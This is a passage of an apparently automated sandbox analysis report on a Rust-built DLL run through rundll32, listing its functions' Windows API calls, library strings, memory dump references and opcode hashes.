                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemmovememset
                        • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                        • API String ID: 2639809894-356128008
                        • Opcode ID: 13df702d9990fb235a8f5e585fa44aff3f99056c021123decdf9189695167f79
                        • Instruction ID: df7e3f941ab3de74a92bb06279dc691a880a3cf6be33ed2b88675f5e6b3f6ca3
                        • Opcode Fuzzy Hash: 13df702d9990fb235a8f5e585fa44aff3f99056c021123decdf9189695167f79
                        • Instruction Fuzzy Hash: F5C1F370E002A88BDF10DFAAC9547AE7FB4EF4D754F204128D815B7B81EB329845CBA1
                        APIs
                        • memmove.VCRUNTIME140(?,?,000001C8), ref: 6CBBBD37
                          • Part of subcall function 6CBF0110: RtlAllocateHeap.NTDLL(02840000,00000000,?,?,6CB65AAF,?,00000004,6CB6E4B2,?,6CBE682F,?,?,?,?,6CBE65EB,00000002), ref: 6CBF011F
                        Strings
                        • invalid SETTINGS frame, xrefs: 6CBBC960
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBC286F, 6CBC2905
                        • PRI * HTTP/2.0SM, xrefs: 6CBBC4DB
                        • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CBC27AC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AllocateHeapmemmove
                        • String ID: PRI * HTTP/2.0SM$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$invalid SETTINGS frame
                        • API String ID: 3274069717-2943561727
                        • Opcode ID: aec748199859b9a5a2441150e92321cca14cc3e3817fdcfbb9c36ed07556bf74
                        • Instruction ID: 5de78c89793ffbdc1fdcc54caf24768f69baf9ecc8c483820607fa57e5279bb2
                        • Opcode Fuzzy Hash: aec748199859b9a5a2441150e92321cca14cc3e3817fdcfbb9c36ed07556bf74
                        • Instruction Fuzzy Hash: EFE350B4A097818FD7A1CF28C184B9ABBE0BF89310F14496EE89CDB355D770A945CF52
                        APIs
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD5CE7
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD5CEA
                        • CertGetCertificateChain.CRYPT32(00000000,?,00000000,00000000,?,C0000001,00000000,00000000), ref: 6CBD5D8F
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD5E36
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD5E59
                        • GetLastError.KERNEL32 ref: 6CBD5E72
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD5EA4
                        • CertFreeCertificateChain.CRYPT32(?), ref: 6CBD5EDD
                        • CertVerifyCertificateChainPolicy.CRYPT32(00000004,?,?,00000010), ref: 6CBD5F57
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD6060
                        • AcceptSecurityContext.SECUR32(?,?,?,0001011C,00000000,?,?,?,00000000), ref: 6CBD6252
                        • InitializeSecurityContextW.SECUR32(?,?,00000000,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CBD62C1
                        • FreeContextBuffer.SECUR32(?), ref: 6CBD62D9
                        • FreeContextBuffer.SECUR32(00000000), ref: 6CBD6386
                        • FreeContextBuffer.SECUR32(?), ref: 6CBD6420
                        • CertFreeCertificateChain.CRYPT32(?), ref: 6CBD6531
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBD653C
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ContextFree$CertCertificate$Chain$Buffer$Security$AcceptErrorInitializeLastPolicyVerify
                        • String ID: P(Hu$unexpected EOF during handshakeassertion failed: size >= nread
                        • API String ID: 619209709-78324864
                        • Opcode ID: 2590b54206ac83006cd35c9a4ea76cc29379f106850e61d955fba0394e1ced16
                        • Instruction ID: 66d6d47f09d92be94332af7292c159df7051feb12b18363fecc74cb97cd7eed6
                        • Opcode Fuzzy Hash: 2590b54206ac83006cd35c9a4ea76cc29379f106850e61d955fba0394e1ced16
                        • Instruction Fuzzy Hash: D36269B06087819FD314CF24C440B9ABBF1FF89718F15891DE9998B781DB75E889CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000138), ref: 6CBDBD79
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD4BE
                        • memmove.VCRUNTIME140(?,?,000000C0,6CC5654C), ref: 6CBDD52B
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD587
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD5A8
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD5E6
                        Strings
                        • invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts, xrefs: 6CBDC645
                        • NO_PROXYno_proxy[, xrefs: 6CBDBE37
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: NO_PROXYno_proxy[$invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts
                        • API String ID: 2162964266-2564500342
                        • Opcode ID: 0b2a1065a002a46bd97564f0c8a8d9d5406840323b6c551d9530d5b0a454b2cd
                        • Instruction ID: 53d1db0f7551f23f6835e1e684cf11b166892b97a839677fb7b0010282b77f8f
                        • Opcode Fuzzy Hash: 0b2a1065a002a46bd97564f0c8a8d9d5406840323b6c551d9530d5b0a454b2cd
                        • Instruction Fuzzy Hash: 04038A716097818FD721CF24C080B9EBBF1FF89314F15896EE8899B751DB71A849CB92
                        APIs
                        • CertDuplicateCertificateContext.CRYPT32(?), ref: 6CBDC7FC
                        • CertOpenStore.CRYPT32(00000002,00000000,00000000,00000000,00000000), ref: 6CBDC817
                        • CertFreeCertificateContext.CRYPT32(00000046), ref: 6CBDC883
                        • GetLastError.KERNEL32 ref: 6CBDC890
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBDC917
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Cert$CertificateContext$Free$DuplicateErrorLastOpenStore
                        • String ID: P(Hu$Z
                        • API String ID: 721414120-976309940
                        • Opcode ID: a5d02ae3d9c8c60481363a452e753d2dece23165d67f7b4a00046563f25cd9cb
                        • Instruction ID: 880ba367ddebdf2f4bad66cca25169238e5d1c40f53223556922ebf178144508
                        • Opcode Fuzzy Hash: a5d02ae3d9c8c60481363a452e753d2dece23165d67f7b4a00046563f25cd9cb
                        • Instruction Fuzzy Hash: 2DB247755097C08FC366CF24C484BDABBE1BF8A314F1589AEE4C99B351DB70A849CB52
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: $/1.1$/1.1$E$HTTP$PRI * HTTP/2.0SM$close
                        • API String ID: 0-737735271
                        • Opcode ID: 8419d090289fd9ccffe929fda16b34218b2bb9ce160333dc4439a1ffc2d49e78
                        • Instruction ID: c8c32be841ef819a031ca992555feaee8f49fa799a123f0f885bf505d05f33ca
                        • Opcode Fuzzy Hash: 8419d090289fd9ccffe929fda16b34218b2bb9ce160333dc4439a1ffc2d49e78
                        • Instruction Fuzzy Hash: 005379756093D18FD325CF24C49079BBBE1AFCA318F248A2EE4998B751DB749849CB43
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000048), ref: 6CB61E3F
                        • memmove.VCRUNTIME140(?,?,0000004E), ref: 6CB61E52
                        • memmove.VCRUNTIME140(?,?,0000004E), ref: 6CB61EE6
                        Strings
                        • ://assertion failed: !self.serialization[scheme_end_as_usize..].starts_with("://"), xrefs: 6CB61FB9
                        • core thread exited early, xrefs: 6CB62EB6
                        • has_authority means set_password shouldn't fail, xrefs: 6CB62B01
                        • , xrefs: 6CB638AF
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: ://assertion failed: !self.serialization[scheme_end_as_usize..].starts_with("://")$core thread exited early$has_authority means set_password shouldn't fail$
                        • API String ID: 2162964266-3378296264
                        • Opcode ID: 96068575b504965680d5e58dfd3785d98c3de205d0ae33cb2c6b743a7553cdbc
                        • Instruction ID: 894693cf8675a87601606e778d8ea21d51b72653da0c58f93b9f68279d43b06c
                        • Opcode Fuzzy Hash: 96068575b504965680d5e58dfd3785d98c3de205d0ae33cb2c6b743a7553cdbc
                        • Instruction Fuzzy Hash: DEC217756087818FD365CF29C48079BFBE1BF89314F108A1EE9D99B741DB709989CB82
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CB7C209
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CB7C247
                        • memmove.VCRUNTIME140(?,?,00000088), ref: 6CB7C2BF
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7C470
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7CBA8
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CB7CC09
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CB7CC3F
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7CC6E
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7CCB8
                        • memmove.VCRUNTIME140(?,?,0000007E,?), ref: 6CB7CD12
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7CD3B
                        • memmove.VCRUNTIME140(?,?,00000088), ref: 6CB7CD65
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$FreeHeap
                        • String ID:
                        • API String ID: 3670176668-0
                        • Opcode ID: fb8364ab4b045572aa00c3708a86a04658651aa26dc317491f7db0261af0c0cf
                        • Instruction ID: fc8048d7753d1e18f3888cbfe6997631bac7ee4a147b49cd4de51c7cc564c8f2
                        • Opcode Fuzzy Hash: fb8364ab4b045572aa00c3708a86a04658651aa26dc317491f7db0261af0c0cf
                        • Instruction Fuzzy Hash: 317279759097818FD722CF24C4507EEFBE1BF8A308F04895DE8A85B791D770A549CBA2
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000090), ref: 6CBCDECE
                        • memmove.VCRUNTIME140(?,?,00000090), ref: 6CBCDF5F
                        Strings
                        • assertion failed: self.can_inc_num_recv_streams(), xrefs: 6CBCEE1E
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBCEE5C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: assertion failed: self.can_inc_num_recv_streams()$called `Result::unwrap()` on an `Err` value
                        • API String ID: 2162964266-2757891961
                        • Opcode ID: b3fcf6c6185b102a238cc7c2ca25db128827e924a5f82bfa8413911f5724341f
                        • Instruction ID: eb897719c47f80c205db2a0d88b733f5580dbf293e51b5a69dcc98bc739dd234
                        • Opcode Fuzzy Hash: b3fcf6c6185b102a238cc7c2ca25db128827e924a5f82bfa8413911f5724341f
                        • Instruction Fuzzy Hash: 755233756093C19FC321CF24C484B9ABBE0BF99314F04895EE8D99B791D770AA49CB92
                        APIs
                        • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBE840A
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBE8255), ref: 6CBE8419
                        • GetConsoleMode.KERNEL32(00000000,?), ref: 6CBE8457
                        • NtWriteFile.NTDLL ref: 6CBE84DD
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CBE84ED
                        • RtlNtStatusToDosError.NTDLL ref: 6CBE857A
                        • CloseHandle.KERNEL32(00000000), ref: 6CBE876A
                        Strings
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBE871C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                        • String ID: called `Result::unwrap()` on an `Err` value
                        • API String ID: 3090192319-2333694755
                        • Opcode ID: f83b5140a1ddc67fa823b65f5cecb50555382294a426ece3fa368a7dbd9ff095
                        • Instruction ID: 30b1fadab58d644af66a6339032b10ebefed8f75ba0142d1a1b31c76c5ab402f
                        • Opcode Fuzzy Hash: f83b5140a1ddc67fa823b65f5cecb50555382294a426ece3fa368a7dbd9ff095
                        • Instruction Fuzzy Hash: 1DB128B0E006889FDB00CF98C880BEEBFB5EF49758F54412EE451AB781D7769949CB61
                        APIs
                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CBF27D3
                        Strings
                        • full, xrefs: 6CBF2892
                        • <unnamed>, xrefs: 6CBF26A8, 6CBF2870
                        • Box<dyn Any>aborting due to panic at , xrefs: 6CBF2848
                        • RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo, xrefs: 6CBF25FE
                        • main, xrefs: 6CBF2934
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressSingleWake
                        • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo$full$main
                        • API String ID: 3114109732-636500360
                        • Opcode ID: a99cb6b40b6b3ef35914bcb91284147c1cd265c271867baa3fac68963d3fd1fd
                        • Instruction ID: a62f20b3269b313db5795e302468aab5be6c370d9ed29603a4cc62479e62b02f
                        • Opcode Fuzzy Hash: a99cb6b40b6b3ef35914bcb91284147c1cd265c271867baa3fac68963d3fd1fd
                        • Instruction Fuzzy Hash: FF225CB0604B808FD721CF26C198766B7F1EB45308F14896DC9AA8BF91D775F44ACB92
                        APIs
                        • memset.VCRUNTIME140(?,00000000,00001000), ref: 6CBE9F8A
                        • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6CBE9FA6
                        • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6CBE9FD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: FormatHandleMessageModulememset
                        • String ID: NTDLL.DLL
                        • API String ID: 2302251862-1613819793
                        • Opcode ID: fa79b0731f1a830a7b6d52fc5385b98e842225ec54b49a780378da15fa6edc15
                        • Instruction ID: d5e5ae383ce8da822e67133cc3b54e64f1e3dbdaba2950086275403436029d6c
                        • Opcode Fuzzy Hash: fa79b0731f1a830a7b6d52fc5385b98e842225ec54b49a780378da15fa6edc15
                        • Instruction Fuzzy Hash: 53D1CF71E042988FDB00CF95C8807EEBFB9FB49794F244229D411ABB85D3795949CFA1
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD587
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD5A8
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE22
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE50
                          • Part of subcall function 6CBACCB0: memmove.VCRUNTIME140(?,?,00000000), ref: 6CBACD09
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBDDECB
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE121
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE27B
                        • memmove.VCRUNTIME140(00000100,?,000000D8), ref: 6CBDE45F
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 2022b05e2a3b91de7d766059ac99ef3308ccb344827c2e837419e2e4a18ff77e
                        • Instruction ID: 85e30da64fcf1db8b53edcfbb920c55af827681c1fc74937f537df0d650ec0d6
                        • Opcode Fuzzy Hash: 2022b05e2a3b91de7d766059ac99ef3308ccb344827c2e837419e2e4a18ff77e
                        • Instruction Fuzzy Hash: EB424671A087808FD761CF24C484BDEB7E1BF89314F05896EE9899B351DB71A849CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD587
                        • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CBDD5A8
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE22
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE50
                          • Part of subcall function 6CBACCB0: memmove.VCRUNTIME140(?,?,00000000), ref: 6CBACD09
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBDDECB
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE121
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE27B
                        • memmove.VCRUNTIME140(00000100,?,000000D8), ref: 6CBDE45F
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 2beecba5f79dcd21d48820e535a36d78e858c8a04d6a6d8183679c76a0868d15
                        • Instruction ID: eb9f57cc33c2b1eeb7d8ff834b14ee282af1d6fae314236a8ba8ee7bf8eeb406
                        • Opcode Fuzzy Hash: 2beecba5f79dcd21d48820e535a36d78e858c8a04d6a6d8183679c76a0868d15
                        • Instruction Fuzzy Hash: C3424871A087808FD725CF24C484BDEB7E1FF89314F05896EE9899B751DB70A849CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE22
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDDE50
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBDDECB
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE121
                        • memmove.VCRUNTIME140(?,?,000000D8), ref: 6CBDE27B
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: bae67dcf9ba4cedb9ff0fb25473f382c9c0b1719cc12374b9251abf4304f1519
                        • Instruction ID: 28d0491a719c68f7155e4afd27d3961f43a7b3086ae547fe91e3b8df2da56337
                        • Opcode Fuzzy Hash: bae67dcf9ba4cedb9ff0fb25473f382c9c0b1719cc12374b9251abf4304f1519
                        • Instruction Fuzzy Hash: 6F424771A087808FD761CF24C484BDEB7E1FF89314F05896EE9899B351DB71A849CB92
                        APIs
                          • Part of subcall function 6CBEFDD0: QueryPerformanceCounter.KERNEL32 ref: 6CBEFE15
                          • Part of subcall function 6CBEFDD0: QueryPerformanceFrequency.KERNEL32 ref: 6CBEFE5C
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFE97
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFEF2
                          • Part of subcall function 6CBEFDD0: __aulldiv.LIBCMT ref: 6CBEFF07
                          • Part of subcall function 6CB95841: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,6CB95223,?,00000000,?,6CC5CEDC,6CC5D1B8), ref: 6CB9585E
                        • memmove.VCRUNTIME140(?,?,00000380), ref: 6CBABDF2
                        Strings
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBABE84
                        • bdp enabled implies bytes, xrefs: 6CBABE96
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBABE6C
                        • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CBABE43
                        • pong received implies ping_sent_at, xrefs: 6CBAB7E7
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
